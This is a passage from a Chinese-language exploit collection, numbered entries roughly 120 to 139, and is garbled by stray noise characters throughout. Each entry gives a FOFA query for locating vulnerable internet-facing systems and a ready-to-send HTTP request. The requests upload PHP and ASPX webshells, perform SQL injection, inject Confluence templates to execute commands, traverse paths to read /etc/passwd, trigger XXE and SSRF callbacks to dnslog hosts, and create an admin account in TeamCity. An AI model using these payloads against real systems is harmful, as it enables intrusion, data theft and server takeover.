POST /useratte/web.php? HTTP/1.1; D" m! S$ I, \' E0 T5 Q- M# D' H
Host: ip:port
6 i' m- `5 P, D I! c& q% {7 K% O' ECookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db2 m% Y# q. J9 J4 ]+ e# \4 D
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko$ @8 u3 _- H8 B) f6 U- r% r0 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 D( o# \/ i7 D. g9 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 d8 O! k$ F2 x" a" w/ X5 b7 o
Accept-Encoding: gzip, deflate
6 Y1 i$ @! C: H$ @- s! T6 \Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328# L1 I& l l( g0 G8 y
Content-Length: 5974 ^/ ?; T6 X V- g+ I) b
Origin: https://ip:port
; f9 F6 V) t) M6 B6 E; C0 }7 }Referer: https://ip:port/sysmanage/licence.php2 O+ K& ~* ]$ A9 y. y/ M: d8 R
Upgrade-Insecure-Requests: 1
* ~, v; _% J, t5 WSec-Fetch-Dest: document
4 `. @2 g, [' @6 j2 r9 RSec-Fetch-Mode: navigate
: ]* @% B$ z+ x& D& F* |8 b8 gSec-Fetch-Site: same-origin
- a: a" O1 t( M( y; n; y- \Sec-Fetch-User: ?1/ @% V3 x: D8 W4 |7 V
Te: trailers2 U+ h' U4 ~$ T( a' S9 h
Connection: close8 N1 f( P. E# E2 w. P& A9 y+ b
' W% Q7 N9 V) U+ f2 s( m-----------------------------42328904123665875270630079328
; o& ]0 e+ M2 b( f3 `2 Y3 ~Content-Disposition: form-data; name="file_upload"; filename="2.php": o Z. P4 W4 t+ E
Content-Type: application/octet-stream
) d# i9 p/ S7 L4 f+ G6 U% n# A# l& `* h% p* D' v
<?php phpinfo()?>0 C3 g M! e2 O+ d7 Q! v
-----------------------------423289041236658752706300793286 l4 ~3 f! N* O* l' v; d
Content-Disposition: form-data; name="id_type"# D j; ^! `4 y3 ?, `
1 c! }2 Y3 R$ T ?0 F1
2 @. ~! \# A5 V. ^4 a-----------------------------42328904123665875270630079328
2 |6 B1 J9 K S$ s, u/ `Content-Disposition: form-data; name="1_ck"
% v' u+ B- f# d q0 F
( i7 e% H- R/ P O8 O# r4 N1_radhttp
) @- o$ k$ z4 h" W5 ?9 y4 f-----------------------------423289041236658752706300793287 f% a0 f/ w" w! S `8 T n% ?2 v
Content-Disposition: form-data; name="mode"& s- O/ V" r' g: M( N9 ~% ^
8 M" p4 L" C1 L r: ^* pimport
; O8 E2 u5 f; i5 L' @-----------------------------42328904123665875270630079328
* q$ ~0 o: [1 G8 D) K% d4 G7 I
7 `5 j! L+ X( \- J( K; O- g
- g9 G2 P6 j. p/ ^8 [7 A文件路径/upload/2.php
" L4 t+ F+ f$ x2 J s, C7 W2 L- d, h: A% x2 v
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
, M& ?2 |! r; V5 |2 YCVE-2024-1918+ `5 |+ m3 G# T6 W) ?
FOFA:title="Smart管理平台"3 p& r. A) Q& b* ~
POST /useratte/userattestation.php HTTP/1.1
, M+ ^* J% G9 a! O0 O! t& J; QHost: 192.168.40.130:8443* \2 h& ?) l/ I/ p: k; ? |
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50/ C( H* d2 a. ^# c6 g% C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
$ q M8 x. d. A, F; vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 f1 x3 C7 w5 m3 k U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 K9 ^" p0 W; b; U
Accept-Encoding: gzip, deflate% _1 {! Q5 w. S+ G% L/ w; N
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
. N* I. w7 e; \& {& y# eContent-Length: 592
9 }/ L! m7 U4 P* q. JOrigin: https://192.168.40.130:8443% R+ N& k# P3 @( f
Upgrade-Insecure-Requests: 1
( i6 o* D* @8 R+ O B7 }3 `, e1 a$ O& l# D9 wSec-Fetch-Dest: document2 g/ y( X; p$ B7 t' Y3 @# V
Sec-Fetch-Mode: navigate( d/ Z! l, v, W, ?( M# R# U! ~
Sec-Fetch-Site: same-origin
0 X- _" ?' m. P0 C2 C4 d! f* bSec-Fetch-User: ?1
" I7 u( ^2 a3 d, p2 ~Te: trailers' d" B5 p: C0 v9 A( U( _
Connection: close/ b- k9 \% |+ a. z& s2 i
) V$ g' ^7 D$ `* e-----------------------------42328904123665875270630079328# b: r L# k& ]2 e
Content-Disposition: form-data; name="web_img"; filename="1.php"
6 {) x i) Y7 v ]Content-Type: application/octet-stream
- C" R( M' k8 S
8 j" N- i1 h) N( Y<?php phpinfo();?>
; C f4 S% j7 S5 g) q g7 Y-----------------------------423289041236658752706300793288 b7 t$ f* D" ^
Content-Disposition: form-data; name="id_type"6 k* L* S2 b# \: ~
! _) @# w# `7 V$ W( o# _% L12 `0 r3 q# f" b, M- w
-----------------------------42328904123665875270630079328. t7 x6 H2 ?! K' }, e1 ?) \) C5 m
Content-Disposition: form-data; name="1_ck"
; @9 T1 D" P) n% e6 m
0 _, g, ?! m6 B9 J/ [1_radhttp$ [0 Y( ~) f% E6 X. U, Z+ B
-----------------------------42328904123665875270630079328
+ W% c1 X3 d9 ?$ xContent-Disposition: form-data; name="hidwel"+ G/ k( e8 Y! K
: l2 v7 i' S, K1 R8 I: C. gset
2 @; S/ |9 J% n- L-----------------------------42328904123665875270630079328
& j+ M9 b: D) ]1 \# }
9 R: \5 _, l4 H
2 n$ w& D$ I8 Gboot/web/upload/weblogo/1.php
1 V0 w( A8 m4 q- f8 V! N& Z; l6 @/ _. b4 N& P/ |1 I
122. 北京百绰智能s200管理平台/importexport.php sql注入9 P; S) q7 y7 k3 p! i8 f" b+ }( _) S. v: q
CVE-2024-27718FOFA:title="Smart管理平台"0 q% T) ?. |0 A" c
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()5 K3 ?: a7 h& E4 `2 e9 i) x$ Y! R
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
& v" T* _" O! tHost: x.x.x.x
" j2 \% X+ C* O! i- P T( z* R1 l' S, H/ NCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0% [% b. l, B1 r& J* A( r2 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 V1 \ q" ^ ^- \7 i7 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& N k- j! i; e p$ x) R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) G7 e* a4 B! X& W3 p/ u2 lAccept-Encoding: gzip, deflate, br
" b7 u. C& T+ e& O$ O' O* H# C4 yUpgrade-Insecure-Requests: 1
+ v8 {# T) R" k: lSec-Fetch-Dest: document
, O! M( P4 G s) [7 A) ZSec-Fetch-Mode: navigate
% _3 N0 s, a' |7 U, B! ZSec-Fetch-Site: none0 H6 V, N) F r. z6 D9 j
Sec-Fetch-User: ?17 u1 i$ d4 E$ r# v! A
Te: trailers
1 m3 ]% O* f( P7 sConnection: close
( }0 `. p- V8 b% R( M; d' ^8 T4 ~3 X! v/ u, w) b- N7 p$ I( {( R/ f
( u" {6 J, Y( \# e123. Atlassian Confluence 模板注入代码执行* {$ F4 v: H: G9 I
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
7 j+ y5 `; q' k6 t9 |POST /template/aui/text-inline.vm HTTP/1.17 T3 _, t+ Y: {5 r4 \
Host: localhost:8090
, z* j% q7 ]0 u0 uAccept-Encoding: gzip, deflate, br' |- _& z! q Z o0 u
Accept: */*
& d: Y4 _% Z. w Z# C! M wAccept-Language: en-US;q=0.9,en;q=0.8
0 d' T K, O9 v8 a E5 n# \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36; m/ p1 e0 U; N" U
Connection: close- i9 K# J9 W4 T- X' ?) u6 g: m
Content-Type: application/x-www-form-urlencoded# ]! u; s4 ~8 W% x8 e
% I/ D9 M" ~8 \, i9 Q0 g( ~$ r# X" x3 elabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
: {* W6 I6 C! n2 R/ D
) v" _- q& t1 C/ ?
' l' j, M, p1 L) Y! k& K' s124. 湖南建研工程质量检测系统任意文件上传+ L C% ?0 { v6 a1 k4 _ B* s/ s6 ~
FOFA:body="/Content/Theme/Standard/webSite/login.css"* y$ F; y! H( v" C
POST /Scripts/admintool?type=updatefile HTTP/1.1
7 r8 E6 |- a9 \/ yHost: 192.168.40.130:8282
& F+ w- D- v1 Z; gUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, b p! J( c) C5 Y3 _Content-Length: 72
, d3 k8 J- `0 {3 g% T6 }/ WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 C+ V3 I. F/ _ _Accept-Encoding: gzip, deflate, br
4 T" f$ g `/ YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' i0 C6 ]/ M$ p2 M9 ^Connection: close% q5 j- D, U/ b0 }5 h
Content-Type: application/x-www-form-urlencoded f2 [9 D: q, V: ]; f7 u( P
* o; G: C0 a4 Q! |: |8 ]filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
, D! ^0 v* D; A' H v# k2 t6 t" Y& e& D
& E7 L7 v& V! _/ G# K3 j) N
http://192.168.40.130:8282/Scripts/abcgcg.aspx
) F9 T. U# V4 ?- j# b% J% x% n7 U
125. ConnectWise ScreenConnect身份验证绕过
* z5 p, }( X6 r$ pCVE-2024-1709- W3 E4 M! G. ~9 p
FOFA:icon_hash="-82958153"
" C+ i$ q$ I! Y- Yhttps://github.com/watchtowrlabs ... bypass-add-user-poc$ _7 K7 t& H* q0 D; A# V+ E2 h
* d2 t/ c. b9 z9 i7 c* F) i+ _! B
# D% D5 j/ Z0 y; T- Q
使用方法/ P( Q+ y: x5 q% C- F
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
3 o- P/ A3 o6 b. ]2 c# N. O
( k: y5 O7 d% B" N# I( G& X
! v1 V. F! Y* M" y& M" `创建好用户后直接登录后台,可以执行系统命令。
% ~# ?9 p: b5 D5 M
8 a& f4 v, P4 z" m; }3 r- [126. Aiohttp 路径遍历
* w* F1 A0 n' eFOFA:title=="ComfyUI"
+ m* e( r, Z( F2 J& oGET /static/../../../../../etc/passwd HTTP/1.1
# @% [; U( f4 ~# ]; Y$ j/ oHost: x.x.x.x/ ]5 Z8 t+ Y' q* g" r: g2 ]/ u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 Z5 K$ V9 @$ K; r0 [
Connection: close! i0 U) y5 @0 d8 B' J w" n
Accept: */** |3 m$ V/ `, I3 _+ r, _' Q4 a) ?% m9 w
Accept-Language: en( K; s+ k3 F% C' Q6 k8 I
Accept-Encoding: gzip {' H! i5 b# M
& h: F6 l$ G2 K- g- k
+ b$ P+ K& U2 B4 ?8 f
127. 广联达Linkworks DataExchange.ashx XXE& y7 B3 {( Q }) n
FOFA:body="Services/Identification/login.ashx" : k( }5 }% {0 X
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1% q) }' b; ?/ p+ J$ @: g
Host: 192.168.40.130:8888. c- \7 }& }0 J0 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
* B1 }" g- _( s- C. D9 c- B$ ?( t7 ZContent-Length: 415. e& X/ M, ]$ N8 z6 ^3 i( {' u! w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 l4 b+ y E' Y" B0 T4 Y( F1 A5 N
Accept-Encoding: gzip, deflate: D6 H& z: q1 P5 W
Accept-Language: zh-CN,zh;q=0.97 U2 [7 d, P8 r
Connection: close7 N" B- e8 H7 ^* _7 c
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe08 n& q0 ^4 j/ c+ `8 `/ D$ k) G
Purpose: prefetch
9 d* y. o+ L5 D; h4 H1 e( m9 {! xSec-Purpose: prefetch;prerender
4 k# M" @( d8 ]* l5 u8 p& l2 g+ W$ W: M& @# D
------WebKitFormBoundaryJGgV5l5ta05yAIe0
6 v( z# |! T8 L5 L( ?. eContent-Disposition: form-data;name="SystemName"1 U2 v* V; \9 j$ T! F
4 e2 \1 f4 p8 L* {+ R5 l
BIM
6 j/ a5 b6 [& V- Q; @------WebKitFormBoundaryJGgV5l5ta05yAIe0/ N I+ j8 {+ l) G" P: F
Content-Disposition: form-data;name="Params"5 U$ T: L1 w* J
Content-Type: text/plain
5 S ^* K$ z7 V; w- o# w$ J5 j& R, l* A
<?xml version="1.0" encoding="UTF-8"?>' X% t/ M8 j4 W: v7 i; f% e
<!DOCTYPE test [1 D& N% ?3 z% m& s1 L+ \* v# U, d
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
9 {+ H" F1 e4 e& N2 Z4 t]6 A2 o& T, |2 K- b
>
) l" z# }2 F4 H3 E5 Z0 T7 f8 A<test>&t;</test>
& V, I8 j( Y2 X3 B5 t! N------WebKitFormBoundaryJGgV5l5ta05yAIe0--# G+ b. u1 C7 t, b7 Q
5 t% s1 W% b7 p+ e9 i8 m( }" a$ A
+ {0 ?1 X+ \/ j; h) i( g" ]4 Y$ H/ ]! o: T2 _+ T; D
128. Adobe ColdFusion 反序列化9 {; A2 u/ y6 {2 C7 n2 v, b ^ d
CVE-2023-38203
- \9 _$ p. C- z3 G7 gAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
, C1 h$ M% `3 PFOFA:app="Adobe-ColdFusion"
8 ^$ r2 [+ m" G0 E; QPAYLOAD" y8 }0 O! g% q0 l
& y5 l, e; ~6 E) R
129. Adobe ColdFusion 任意文件读取5 ]" w9 x( H6 ?0 j( R3 M% `* i5 K
CVE-2024-20767- f+ b+ ]4 w3 h$ J" h C1 k
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request": B- }4 M( v% g5 N8 ~
第一步,获取uuid
7 ^9 a, a' u% z& {8 g5 V' K; e iGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
3 P5 z6 T& [) |Host: x.x.x.x& s1 S, e* f. Y. }/ `2 B4 @" K8 ~% [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. T" e) F6 S) e% \Accept: */*8 i* C) \% K3 S. O% _( b$ s
Accept-Encoding: gzip, deflate3 k( S# S( F# ?$ t
Connection: close- b( q* u1 _( p
* N6 [- ^" D- L" G
+ C* }; N% X4 m/ _* I$ x第二步,读取/etc/passwd文件
. L3 h2 G, e2 ^GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
* S+ \* m7 D+ h2 k; i. }Host: x.x.x.x9 @ z- N/ c. G/ ~. R) E1 ~- u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 Z; ?) p' x- E. e N
Accept: */*7 X! _2 G+ ?1 |
Accept-Encoding: gzip, deflate2 G" y/ a( ?. I+ r3 l
Connection: close
6 ^( M4 s. n5 p! F$ x1 [uuid: 85f60018-a654-4410-a783-f81cbd5000b9
7 r1 ]: M; ^7 u! F5 h! V8 M) E' }8 f. n7 }8 v3 D; k) k. z. \
% a; j, S$ h+ z: p! Q; w, h) R1 q130. Laykefu客服系统任意文件上传
; o1 S% o5 t' [2 C9 p9 CFOFA:icon_hash="-334624619"' O& O. Z$ n1 P
POST /admin/users/upavatar.html HTTP/1.19 Z5 y+ u6 S! U: i; b1 j3 S- K
Host: 127.0.0.1+ C" V3 U4 V, N7 }( K
Accept: application/json, text/javascript, */*; q=0.01! x: M: J' V1 s: E
X-Requested-With: XMLHttpRequest! K# ~1 O5 B$ S" w/ a y9 ?1 F
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26, I0 m- x% Y2 y3 O3 D k7 c7 F. x. ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
% L8 I$ n/ Q: nAccept-Encoding: gzip, deflate) n! D) C! U- {% t! k* q
Accept-Language: zh-CN,zh;q=0.9
; M6 ?0 i: ^8 \9 F }Cookie: user_name=1; user_id=3
, q# G1 L+ `/ M9 Y' \4 \, I4 cConnection: close/ }; Z2 G. W/ U! J* L I
5 y2 d( k0 c: C7 F9 ]& Y6 Q+ g- J6 l------WebKitFormBoundary3OCVBiwBVsNuB2kR
$ T& _, g$ u$ h# I6 ]Content-Disposition: form-data; name="file"; filename="1.php"
% j! l6 q2 n _* hContent-Type: image/png' _3 t+ v( S4 n
3 B4 j& _9 z. m. ~
<?php phpinfo();@eval($_POST['sec']);?>4 r* A' ], |' O$ V2 G2 y+ t
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
: ]$ [! W% u2 ~$ H9 y9 a* z! `. O# y2 z, f
. h; N: _5 f9 \* Z8 B# h* K
131. Mini-Tmall <=20231017 SQL注入 t: N/ U9 }/ z. J/ W* r2 s
FOFA:icon_hash="-2087517259"
, ?8 k0 e% `$ T后台地址:http://localhost:8080/tmall/admin
3 C# p: u) X+ h3 j& qhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0): C. x+ H3 k6 v. f
$ R) {3 n$ O- o( o' d; \( Q/ ~ O132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
, V/ Q$ q8 S* S, p/ m& S L, hCVE-2024-27198, p% S" K' K6 G8 p1 A
FOFA:body="Log in to TeamCity"4 D+ Y5 S: z/ U" G
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1- x. R# K* y- `. f; Q6 `, H
Host: 192.168.40.130:8111/ ~6 o% ?+ E/ a/ D& E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. `: v0 C/ B8 }0 ?2 K
Accept: */*! e* d; \: \, @8 v
Content-Type: application/json
: X- c5 F1 ?6 D2 [% Z2 JAccept-Encoding: gzip, deflate
9 g0 g, J! L" C, g
4 W# ^& k) h* o4 s0 ?4 v! p" m0 T- X{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}7 @2 w( ^7 T3 `9 N' E& E, P
( v- M/ x7 E8 v' t' T. z) J9 K
# e3 @0 ?9 K5 y r d' ^+ Y
CVE-2024-27199% w \* \; O( D
/res/../admin/diagnostic.jsp- X$ W7 [; T9 W! {% ^
/.well-known/acme-challenge/../../admin/diagnostic.jsp$ m" I9 f/ A2 u5 h
/update/../admin/diagnostic.jsp
+ |7 v% j1 a4 H; Y3 ^# o% @, i0 J! `$ _- t$ b4 G9 S+ g$ f4 l( ] ~# G
s5 n2 A) M! g) F+ [) g) m
CVE-2024-27198-RCE.py
" D4 t# {) Q# f9 x1 {5 B u
. q: z* g- W' x3 b$ Z, D133. H5 云商城 file.php 文件上传8 d# z' C2 x$ ^! k. c J8 u# I
FOFA:body="/public/qbsp.php"* O# }, X8 _( Q1 c0 X% X; h0 S1 b
POST /admin/commodtiy/file.php?upload=1 HTTP/1.14 h+ Y5 l5 y0 `9 \* V2 d8 G
Host: your-ip( ?, \) g) ~. _8 ] v7 T; v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% f) B: _. f5 z! [8 c# J7 b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
- @% `3 W/ Z" Z2 l. P% b. b9 M/ K r
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
) O' u2 e, F( D8 B: u3 X& ~ {7 CContent-Disposition: form-data; name="file"; filename="rce.php"
9 G g# i$ ?' }4 z2 b0 T6 E, jContent-Type: application/octet-stream
* Q- l2 c3 @# y R" G4 ] # k. w& O9 S. U
<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 H) E1 i' n$ O T6 j# X) k------WebKitFormBoundaryFQqYtrIWb8iBxUCx--. ^5 I: P! R- z$ f+ f
7 p o" O# e& {9 |9 S
0 ]) K4 m8 j: W8 N+ d0 A# y/ M/ E8 ^. `! ~" d
134. 网康NS-ASG应用安全网关index.php sql注入
# ?. |% x: C+ g* h2 aCVE-2024-2330' p% k* J2 l: [* L* f
Netentsec NS-ASG Application Security Gateway 6.3版本
$ G) b5 z: p/ l% vFOFA:app="网康科技-NS-ASG安全网关"
. h' `! B, {: t. RPOST /protocol/index.php HTTP/1.1
5 E9 b/ I7 d5 m# E# r! IHost: x.x.x.x
. m6 n' L' y5 uCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
+ I4 S0 e( ]# PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0) O$ d- ~+ u* O2 H2 G$ H
Accept: */*& ?8 J5 T4 x' x4 p3 I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# E' ^& G8 b; [+ a
Accept-Encoding: gzip, deflate
7 |% \' k6 a$ _6 d% fSec-Fetch-Dest: empty
9 q+ u$ W) ^4 _7 I2 V8 XSec-Fetch-Mode: cors' B: D8 `5 q8 I
Sec-Fetch-Site: same-origin
( T3 y3 @& H0 e7 M# Z+ QTe: trailers
: F* D5 i- }3 D/ P6 t" K8 X- vConnection: close3 S# S+ g/ G% w8 Q+ C6 u
Content-Type: application/x-www-form-urlencoded* o- A# a& d% v5 h) j' H" ?3 @
Content-Length: 263' c/ k' d8 g1 @( `9 ~
" |. O8 f4 }" |, j3 Zjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
" j6 d o0 i/ \" }5 t1 n+ w( h% i) e; {7 m
) D7 v1 F' U6 I5 F$ b
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 _' m% k% c ?6 r1 mCVE-2024-2022
+ Z" s/ f: u) G! c/ w% N9 KNetentsec NS-ASG Application Security Gateway 6.3版本- u0 ?* N6 c! X( N- n$ j: C# T
FOFA:app="网康科技-NS-ASG安全网关"1 t* k6 }" G% q: s
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
- y9 |; o2 z9 T( R5 THost: x.x.x.x
6 k4 J* N6 v' v% ~& w" ^1 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& K) ]% \: i6 d* \. g$ |- a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! _% f2 K9 r0 C: Y- `
Accept-Encoding: gzip, deflate& h6 N0 v* i! S. L2 K
Accept-Language: zh-CN,zh;q=0.9
$ R( E; a7 o! o8 d3 N8 |: U* C! YConnection: close
) p: M9 `; Y3 e2 U) F( k" o% @ \, C/ ?9 K+ E: ~. F# G
' Z0 \" H( Q+ D+ k136. NextChat cors SSRF
' q. k5 g2 g* L+ q( k QCVE-2023-49785
4 V& @- v: _' u- T, l! E% ~0 PFOFA:title="NextChat"( Z2 x) j% l& `. D6 N. {8 ?- O
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
; x2 J% C0 E8 l$ D6 r. }$ UHost: x.x.x.x:100005 t8 q" A/ U4 y7 k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! _6 W: S7 @4 bConnection: close
( U& }* t# l9 q. l* @9 wAccept: */*
( h" r+ {9 B; I; L8 I5 hAccept-Language: en8 u5 A4 z; f! V) ~8 N1 D7 `
Accept-Encoding: gzip
4 A. c8 h+ D0 X" G& I
3 F3 g, w4 y# }9 T; \& L5 W) C9 M7 g, _6 G3 }9 b
137. 福建科立迅通信指挥调度平台down_file.php sql注入; \* |( s; Q; u6 a* [
CVE-2024-2620
% a, ?& w) `/ _ N2 q$ c t6 ?, uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; B9 V& Z' V4 Y/ O; s, IGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
' J+ z6 ~3 Y3 m7 YHost: x.x.x.x q _$ b: s# o; P& A' S; n7 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( b0 ^$ L. h9 x7 j2 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 \; {5 j" D0 |6 m. ?$ r0 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: V4 J/ a! x1 d$ T4 N* KAccept-Encoding: gzip, deflate, br
9 W6 F( f. A# b3 cConnection: close: e* w( @& x. z; u$ z
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj; W4 F6 G* e: e- i1 ~3 w, U
Upgrade-Insecure-Requests: 16 e0 @$ X9 S% Z$ z
& n7 U. d3 m1 G- [2 M6 Y
4 t8 [4 R! y# P z/ t4 Y/ h6 a138. 福建科立讯通信指挥调度平台pwd_update.php sql注入( N+ i1 D: ]" J- Q0 L
CVE-2024-2621
' k5 c3 u$ X o, D+ W: Z! ?FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 T8 J: s& k' V; Q7 `
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.12 i+ F" m0 a2 P+ R/ ~
Host: x.x.x.x+ u6 M1 @( V9 l) T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, `: A9 ^" Y3 z2 d5 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. |! V A9 Q# c6 L2 [8 f3 z( e+ D3 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 ~7 L% X" Z; MAccept-Encoding: gzip, deflate, br: H; f9 |: r+ Q, {; X2 ]. H! @
Connection: close
% l1 D' N$ }. L+ yUpgrade-Insecure-Requests: 1
3 D x& E( \* q) W6 y u/ w; I7 I3 m {# }' d% A. K
; }+ l; ~1 v1 t( P& N. z
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ u; S$ J/ q: B( z1 {* _
CVE-2024-2622
8 O( g8 }0 o2 r, D9 SFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! F% W1 } \. a5 g6 L% ?. JGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1/ ? w# l$ ?2 Q; Q
Host: x.x.x.x
6 Y4 g) [ E, R; uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
6 l0 a; \$ M0 W( j4 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
